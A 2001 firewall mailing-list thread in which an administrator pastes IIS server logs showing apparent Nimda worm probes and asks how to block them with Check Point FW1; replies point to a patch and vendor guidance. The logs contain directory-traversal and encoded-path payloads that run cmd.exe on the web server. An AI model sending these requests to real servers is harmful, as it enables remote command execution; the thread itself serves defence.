hi patrick, at this link is a descripiton to create a resource to block nimda http://www.checkpoint.com/nimda.html http://support.checkpoint.com/public/nimda_solution.html :-) peter > -----Urspr�ngliche Nachricht----- > Von: Allison, Mark [SMTP:[EMAIL PROTECTED]] > Gesendet am: Mittwoch, 19. September 2001 17:05 > An: 'Patrick Coomans' > Cc: '[EMAIL PROTECTED]' > Betreff: RE: [FW1] New worm on the road? > > A patch was released from Microsoft in October 2000. Follow the Symantic > link below. > <http:[EMAIL PROTECTED]> > > Mark Allison > Global Cash Access / Central Credit, L.L.C. > [702-855-3037 mailto:[EMAIL PROTECTED]] > > -----Original Message----- > From: Patrick Coomans [mailto:[EMAIL PROTECTED]] > Sent: Tuesday, September 18, 2001 2:36 PM > To: [EMAIL PROTECTED] > Subject: [FW1] New worm on the road? > > > Since this evening I am experiencing massive attacks on HTTP (IIS > oriented I presume) from many different IP addresses. > > They all look like: > > GET > /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir > HTTP/1.0 > GET /scripts/root.exe?/c+dir HTTP/1.0 > GET /MSADC/root.exe?/c+dir HTTP/1.0 > GET /MSADC/root.exe?/c+dir HTTP/1.0 > GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0 > GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0 > GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 > GET > /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir > HTTP/1.0 > GET > /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir > HTTP/1.0 > GET > /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir > HTTP/1.0 > GET > /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/ > system32/cmd.exe?/c+dir HTTP/1.0 > GET > /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/ > system32/cmd.exe?/c+dir HTTP/1.0 > GET > /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/ > system32/cmd.exe?/c+dir HTTP/1.0 > GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 > GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0 > GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0 > GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 > GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0 > GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0 > GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 > GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0 > GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0 > GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0 > GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0 > > > Is anyone aware that this is some new kind of worm? > Now my FW1 question: can I create a HTTP resource (secure server) > that blocks all requests that e.g. have a .EXE in it ? Or would that slow > my FW1's down to much? > > Any other suggestions for good products that can do HTTP content > inspection and that cooperate or can co-exist with fw1 ? > > > Thanks, > Patrick > > ================================================================================ To unsubscribe from this mailing list, please see the instructions at http://www.checkpoint.com/services/mailing.html ================================================================================
